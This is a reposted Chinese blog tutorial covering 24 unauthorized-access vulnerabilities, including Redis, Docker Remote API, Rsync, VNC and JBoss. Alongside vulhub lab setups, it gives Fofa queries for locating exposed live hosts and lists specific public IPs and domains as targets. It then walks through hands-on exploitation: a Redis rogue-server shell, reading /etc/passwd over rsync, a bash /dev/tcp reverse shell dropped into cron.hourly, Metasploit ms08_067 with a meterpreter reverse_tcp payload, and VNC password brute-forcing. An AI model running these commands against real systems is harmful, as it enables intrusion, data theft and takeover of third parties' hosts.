24个未授权访问漏洞详情

news2025/4/7 17:37:49

一、Redis未授权访问漏洞

第一步:进⼊vulhub⽬录使⽤以下命令启动靶机

进⼊⽬录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up -d
检查:docker ps

第二步:在Kali上安装redis程序进⾏服务的链接

#安装redis
apt-get install redis
#redis链接
redis-cli -h 8.155.8.82 -p 6379
#redis常⻅命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使⽤select num可以查看键值数据。
(5)设置变量:set test "whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称

第三步:可以直接连接执⾏命令且不需要认证说明存在未授权访问漏洞....下载以下攻击项⽬


git clone https://github.com/n0b0dyCN/redis-rogue-server

第四步:使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境,交互时输⼊ i 键会获取Shell环境

python3 redis-rogue-server.py --rhost 8.155.8.82 --lhost 8.155.8.82

第一次开启环境可能会报错 再执行一次就可以成功进入

i是正向反弹

二、MongoDB未授权访问漏洞

步骤⼀:在Kali上执⾏以下命令搭建起MongoDB的漏洞环境..

拉取镜像:docker pull mongo
启动容器:docker run -d -p 27017:27017 --name mongodb mongo
查看容器:docker ps -a

步骤⼆:使⽤Nmap的插件脚本进⾏扫描...发现存在未授权访问漏洞.

步骤三:也可尝试使⽤MSF中的模块进⾏漏洞测试....不需要认证即可直接连接...

use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 8.155.8.82
set threads 15
exploit

步骤四:即存在未授权访问漏洞使⽤Navicat进⾏连接...

三、Memcached未未授权访问漏洞

步骤⼀:下载Memcached程序并执⾏以下命令..启动Memcached漏洞环境

#Memcached程序下载
https://www.runoob.com/memcached/window-install-memcached.html
#执⾏命令
memcached.exe -d install
memcached.exe -d start

要使用管理员身份运行cmd

步骤⼆:使⽤Telnet程序探测⽬标的11211端⼝...

#Telnet探测
telnet 172.16.0.176 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造成敏感信息泄露

步骤三:使⽤Nmap程序的脚本进⾏漏洞扫描....

nmap -p 11211 --script memcached-info 172.16.0.176

四、Zookeeper未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索资产信息....

port="2181" && "Zookeeper" && country="US"

步骤⼆:在Kali中使⽤以下命令进⾏未授权访问漏洞测试

echo envi | nc ip 端口

步骤三:可使⽤Zookeeper可视化管理⼯具进⾏连接....

#⼯具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

五、Jenkins未授权访问漏洞

步骤⼀:使⽤以下fofa语法进⾏产品搜索..

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤⼆:在打开的URL中...点击 Manage Jenkins --> Scritp Console 在执⾏以下命令...

#执⾏命令
println "whoami" .execute().text

六、Jupyter NoteBook未授权访问漏洞

步骤⼀:通过以下fofa语法进⾏产品搜索....或使⽤vulhub启动靶场.

#fofa语法
"Jupyter Notebook" && port="8888" && "terminals"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d

步骤⼆:如果存在未授权访问漏洞则直接访问 http://IP:8888 会直接跳到web管理界⾯,不需要 输⼊密码。

步骤三:从 New -> Terminal 新建⼀个终端,通过新建的终端可执⾏任意命令

七、Elasticsearch未授权访问漏洞

步骤⼀:使⽤以下Fofa语法进⾏Elasticsearch产品搜索...

"Elasticsearch" && port="9200"

步骤⼆:存在未授权访问则直接进⼊到信息⻚⾯....不需要输⼊⽤户密码登陆

步骤三:可按照上⾯查看节点信息等

http://ID:端口/version

八、Kibana未授权访问漏洞

步骤⼀:使⽤以下Fofa语句搜索Kibana产品...并打开⻚⾯

"kibana" && port="5601"

步骤⼆:直接访问Kibana的⻚⾯且⽆需账号密码可以登陆进⼊界⾯

九、Docker Remote API未授权访问漏洞

步骤⼀:使⽤以下Fofa语句对Docker产品进⾏搜索

port="2375" && "docker"

步骤⼆:直接使⽤浏览器访问以下路径...

apt install docker-cli

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息
#eg
http://ID/info
http://ID:2375/info

步骤三:使⽤-H参数连接⽬标主机的docker,使⽤ps命令查询⽬标系统运⾏的镜像

docker -H tcp://130.61.230.9:2375 ps
docker -H tcp://130.61.230.9:2375 version
docker -H tcp://130.61.230.9:2375 exec -it 1f4 /bin/bash
操作思路:
docker pull 下载有Docker逃逸的容器下来
docker逃逸间接获取安装docker主机控制权限

十、Kubernetes Api Server未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索Kubernetes产品....

port="8080" && app="Kubernetes"

步骤⼆:在打开的⽹⻚中直接访问 8080 端⼝会返回可⽤的 API 列表

十一、Hadoop未授权访问漏洞

步骤⼀:使⽤以下FoFA语法进⾏Hadoop产品的搜索

port="8088" && app="Hadoop"

步骤⼆:开启⻚⾯直接访问不经过⽤户密码验证....

十二、ActiveMQ未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索产品...

body="ActiveMQ" && port="8161"

步骤⼆:ActiveMQ默认使⽤8161端⼝,默认⽤户名和密码是 admin/admin ,在打开的⻚⾯输⼊

#⽤户登陆
http://ID:8161/admin/
http://ID:8161/admin/
http://ID:8161/admin/

admin admin 登录成功

十三、RabbitMQ未授权访问漏洞

步骤⼀:使⽤以下Fofa语法对RabbitMQ产品进⾏搜索...

port="15672" 
port="15692" 
port="25672"

步骤⼆:在打开的⻚⾯中可输⼊默认的账号和密码进⾏登陆

默认账号密码都是guest
http://x.x.x.x:15672
http://x.x.x.x:25672
http://x.x.x.x:15692
#eg
http://bzgx.yuyiying.com:15672/
http://ID:15672
https://ID:25672/#/

十四、Springboot Actuator未授权访问漏洞

步骤⼀:使⽤以下Fofa语句搜索资产并打开⻚⾯访问

#Fofa语法
icon_hash="116323821"
#eg
http://2.sureyong.com:9999/#/

步骤⼆:当 web 应⽤程序出现 4xx、5xx 错误时显示类似以下⻚⾯就能确定当前 web 应⽤是使⽤了

springboot 框架....

步骤三:拼接以下路径查看泄露的数据..

访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录⽤户的操作
请求,可以伪造cookie进⾏登录。
访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysql、mangodb 之类的数据库服
务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公⽹,那么造
成的危害是巨⼤的。
git 项⽬地址泄露,这个⼀般是在/health 路径,⽐如如下站点,访问其 health 路径可探测到站
点 git 项⽬地址。

十五、FTP未授权访问漏洞(匿名登陆)

步骤⼀:对⽬标环境在资源管理器中⽤以下格式访问...如果该服务器开启了匿名登陆,则可直接进⾏内容查看

ftp://ip:port/

步骤二:本机开启ftp匿名访问前后对比

开启前

开启后

十六、JBoss未授权访问漏洞 *

步骤⼀:使⽤以下语法搜索Jboss产品并打开其⻚⾯....

title="Welcome to JBoss"

步骤⼆:拼接以下路径且⽆需认证直接进⼊控制⻚⾯

#拼接路径
http://ip:port/jmx-console/
#eg
http://177.67.128.116//jmx-console/
http://117.193.144.108:8080/jmx-console/
http://119.8.196.187:8080/jmx-console/

admin admin弱密码登录

十七、Ldap未授权访问漏洞

步骤⼀:使⽤以下Fofa语法搜索使⽤ldap服务的产品....并通过Ldapadmin可视化⼯具做连接验证

#Fofa语法
port="389"
#Ldapadmin⼯具
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/

步骤⼆:启动⼯具并测试存在未授权的LDAP服务...成功如下

步骤三:连接⽬标LDAP服务并查看其内容

十八、Rsync未授权访问漏洞 *

步骤⼀:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up -d

步骤⼆:可使⽤Nmap扫描该端⼝是否开启服务,还可以使⽤Metasploit中关于允许匿名访问的rsync 扫描模块进⾏探测...

# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules_list

步骤三:使⽤命令进⾏链接并读取⽂件....

rsync rsync://8.155.7.133:873/
rsync rsync://8.155.7.133:873/src/

步骤四:对系统中的敏感⽂件下载操作.... /etc/passwd

rsync rsync://8.155.7.133:873/src/etc/passwd 
rsync rsync://8.155.7.133:873/src/etc/passwd /var/www/html

步骤五:上传⽂件...如果有相应的jsp/asp/php环境可以写⼀句话以phpinfo为例...

echo "1" >1.txt
ls
rsync ./1.txt rsync://8.155.7.133:873/src/  
rsync rsync://8.155.7.133:873/src/

步骤六:反弹shell...在此可利⽤定时任务cron来反弹获取shell

查看定时任务
rsync rsync://8.155.7.133/src/etc/crontab
将定时任务下载下来
rsync rsync://8.155.7.133/src/etc/crontab /var/www/html

创建shell文件
echo 1>1.txt
  
vim 1.txt
  
#!/bin/bash
/bin/bash -i >& /dev/tcp/8.155.7.133/8888 0>&1

mv 1.txt shell
cat shell
授权shell文件
chmod 777 shell
上传shell 至靶机
rsync -av ./shell rsync://8.155.7.133:873/src/etc/cron.hourly
攻击机开启nc监听响应端口

下载的定时任务文件

创建shell文件 设置监听ID

上传shell至监听机器

攻击机开启nc监听

十九、VNC未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

(port="5900") && (is_honeypot=false && is_fraud=false)

步骤⼆:可通过MSF中的模块进⾏检测与漏洞利⽤

# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts ID
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts ID
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
破
msf6 auxiliary(scanner/vnc/vnc_login) > run
# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
67_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
r/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts ID
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost ID
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后,直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost ID
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

步骤三:VNC链接验证

vncviewer ipaddress

二十、Dubbo未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤⼆:使⽤Telnet程序直接进⾏链接测试

telent IP port

二十一、NSF共享⽬录未授权访问

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

"nfs"

步骤⼆:执⾏命令进⾏漏洞复现

#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享⽬录
showmount -e 192.168.126.130
#挂载相应共享⽬录到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸载⽬录
umount /mnt

二十二、Druid未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa与Google上进⾏资产收集....

# Fofa
title="Druid Stat Index"
# PHPINFO⻚⾯
inurl:phpinfo.php intitle:phpinfo()
info.php test.php
 
# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index"

步骤⼆:对访问到的站点查看

步骤三:Druid批量扫描脚本...

https://github.com/MzzdToT/CVE-2021-34045

二十三、CouchDB未授权访问

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集....或开启Vulhub靶场进⾏操作

# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)
# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

步骤⼆:执⾏未授权访问测试命令

curl 192.168.1.4:5984
curl 192.168.1.4:5984/_config

步骤三:反弹Shell参考

https://blog.csdn.net/qq_45746681/article/details/108933389

二十四、RTSP未授权访问漏洞

步骤⼀:使⽤以下语句在Fofa上进⾏资产收集

(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp" 

步骤⼆:使用工具vlc-3.0.19连接

尝试弱密码

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2268707.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

python3中条件判断语句:if 语句与if嵌套语句

一. 简介 本文开始学习 python3中条件判断语句。Python 条件语句是通过一条或多条语句的执行结果(True 或者 False)来决定执行的代码块。 二. python3中条件判断语句:if 语句与 if嵌套语句 1. if 语句 Python中if语句的一般形式如下所示&…

vue实现下拉多选、可搜索、全选功能

最后的效果就是树形的下拉多选&#xff0c;可选择任意一级选项&#xff0c;下拉框中有一个按钮可以实现全选&#xff0c;也支持搜索功能。 在mounted生命周期里面获取全部部门的数据&#xff0c;handleTree是讲接口返回的数据整理成树形结构&#xff0c;可以自行解决 <div c…

在 Unity 6 中为您的世界创建全局照明的新方法(三)

本文是Unity 6全局光照功能介绍系列中的最后一篇文章&#xff0c;在上篇文章中我们为大家介绍了关于使用沙漠绿洲场景创建实时光照的案例&#xff0c;在本文中我们将承接上篇文章继续为大家介绍如何使用Unity 6中的APV探针功能在URP管道中的另一个案例“花园场景”中创建实时光…

《计算机组成及汇编语言原理》阅读笔记:p116-p120

《计算机组成及汇编语言原理》学习第 7 天&#xff0c;p116-p120 总结&#xff0c;总计 5 页。 一、技术总结 1.CPU优化 (1)increase overall performance number 例如&#xff1a;16位电脑提升到32位电脑。 (2)multiprocessing One way to make computers more useful i…

Python的简单爬虫框架

爬虫为网络爬虫&#xff08;又称为网页蜘蛛&#xff0c;网络机器人&#xff0c;在FOAF社区中间&#xff0c;更经常的称为网页追逐者&#xff09;&#xff0c;是一种按照一定的规则&#xff0c;自动地抓取万维网信息的程序或者脚本。另外一些不常使用的名字还有蚂蚁、自动索引、…

优化站群SEO:使用苹果CMS泛目录插件实现泛目录页面刷新不变

优化站群SEO&#xff1a;使用苹果CMS泛目录插件实现泛目录页面刷新不变 在当今数字营销环境中&#xff0c;搜索引擎优化&#xff08;SEO&#xff09;是提升网站流量和可见性的关键策略。苹果CMS作为一款灵活的内容管理系统&#xff0c;提供了丰富的插件功能&#xff0c;尤其是…

Spring Cloud由入门到精通

文章目录 1.初识微服务1.1. 单体架构1.2.分布式架构1.3.微服务1.4 微服务技术比对1.5.Spring Cloud1.6. 总结2.服务拆分和远程调用2.1.服务拆分原则2.2.服务拆分示例2.2.1.项目工程结构设计2.2.2.创建Maven项目工程2.3.实现远程调用案例2.3.1.案例需求:2.3.2. 注册 Rest Templ…

【RK3588 Linux 5.x 内核编程】-内核I2C子系统介绍

内核I2C子系统介绍 文章目录 内核I2C子系统介绍1、内核中的I2C子系统2、内核中的I2C驱动2.1 获取I2C适合器2.2 创建i2c_board_info与设备2.3 创建设备ID和I2C驱动2.4 数据传输2.4.1 发送数据2.4.2 读取数据3、I2C总线如何工作I2C 是一种用于双线接口的串行协议,用于连接低速设…

GPIO相关寄存器,点灯

目录 一.输入模式 1.浮空输入 2.上拉输入 3.下拉输入 4.模拟输入 二.输出模式 1.推挽输出 2.开漏输出 三.寄存器 1.寄存器的作用 2.功能与类型 3.控制某一引脚输出电压来点灯所需要控制的寄存器 1.打开对应时钟开关 2.端口模式寄存器 ---输出模式 3.输出类型寄存…

【基础篇】三、MySQL表结构的操作

文章目录 Ⅰ. 创建表1、语法2、创建表样例3、创建和其它表一样结构的表 Ⅱ. 查看表结构1、查看数据库中的表2、查看指定表的属性3、获取表的创建语句 Ⅲ. 删除表Ⅳ. 修改表结构1、向表中插入新的字段2、删除表中的字段3、修改表名4、修改字段属性 Ⅰ. 创建表 1、语法 create …

Ethernet 系列(12)-- 基础学习::SOME/IP

目录 1. SOME/IP简介&#xff1a; 1.1 什么是SOME/IP&#xff1a; 1.2 什么时候使用SOME/IP&#xff1a; 2. SOME/IP的特点&#xff1a; 2.1 序列化&#xff1a; 2.2 远程过程调用&#xff08;RPC&#xff09;: 2.3 服务发现&#xff1a; 2.4 发布/订阅&#xff1a; 2.5 UDP消息…

前端小案例——轮播图(HTML+CSS+JS, 附源码)

一、前言 实现功能&#xff1a; 显示多张图片&#xff0c;每张图片占据轮播图容器的一部分空间。实现向左和向右的切换按钮&#xff0c;可以点击按钮切换到上一张或下一张图片。在底部显示小圆点&#xff0c;表示当前显示的图片&#xff0c;点击小圆点可以跳转到对应的图片。…

vue封装弹窗元素拖动指令

项目开发过程中我们通常会遇到需要到一些弹窗鼠标可以随意拖动位置去放置&#xff0c;vue里面直接通过封装对应的指令即可&#xff0c;于是封装了一个出来&#xff0c;希望可以用到。 Vue.directive(draggable-dom, draggableDom); 组件节点添加对应指令就可以 v-draggable-…

Supermap iClient Webgl 粒子特效案例-消防场景

作者&#xff1a;Lzzzz 前言 WebGL 粒子特效的应用场景非常广泛&#xff0c;几乎可以在任何需要丰富视觉效果或动态表现的地方看到其身影。通过灵活运用颗粒系统&#xff0c;开发者可以创造出引人入胜的用户体验和视觉表现。 一、效果展示 二、实现步骤 1&#xff0c;构建…

关于无线AP信道调整的优化(锐捷)

目录 一、信道优化的基本原则二、2.4G频段信道优化三、5G频段信道优化四、信道优化代码具体示例五、其他优化措施 一、信道优化的基本原则 信道优化旨在减少信道间的干扰&#xff0c;提高网络覆盖范围和信号质量。基本原则包括&#xff1a; 1. 选择合适的信道&#xff1a;根据…

Rocky9网络基本连接配置

1.修改主机名称 终端模式下&#xff1a; hostnamectl set-hostname server2执行过程中可能要输入密码 hostnamectl命令查看主机信息&#xff0c;可以查看到主机信息已经发生修改&#xff0c;之后reboot重启主机。 2.关闭防火墙 systemctl stop firewalld systemctl disable fi…

一款汽车连接器(HSD(4+2))信号完整性仿真

下面是一款汽车连接器HSD(42) 的3D外形&#xff1a; 其爆炸图如下&#xff1a; 下面是Rosenboger同款产品的2D图&#xff1a; 其信号完整性参数如下&#xff1a; 下面介绍一下如何给上面的3D模型做信号完整性仿真。 在介绍仿真前先介绍一下上面的一些参数&#xff1a;上面的参数…

动手做计算机网络仿真实验入门学习

打开软件 work1 添加串行接口模块&#xff0c;先关电源&#xff0c;添加之后再开电源 自动选择连接 所有传输介质 自动连接 串行线 绿色是通的&#xff0c;红色是不通的。 显示接口。se是serial串行的简写。 Fa是fast ethernet的简写。 为计算机配置ip地址&#xff1a; 为服…

在React中引入tailwind css(图文详解)

Tailwind CSS 是一个功能强大的 CSS 框架&#xff0c;旨在使开发者能够以更高效、灵活的方式创建现代、响应式的网页。与传统的 CSS 框架&#xff08;如 Bootstrap 或 Foundation&#xff09;不同&#xff0c;Tailwind 采取了“实用类”&#xff08;Utility-First&#xff09;的…

考公怎么安排学习顺序?

考公的学习顺序安排至关重要&#xff0c;合理规划能让备考事半功倍。以下是结合 “稳啦” 小程序的推荐学习顺序。 1. 初步了解考情&#xff08;使用稳啦的各省考情模块&#xff09; 在备考初期&#xff0c;首先要做的就是全面了解公务员考试的基本情况。通过稳啦的各省考情模…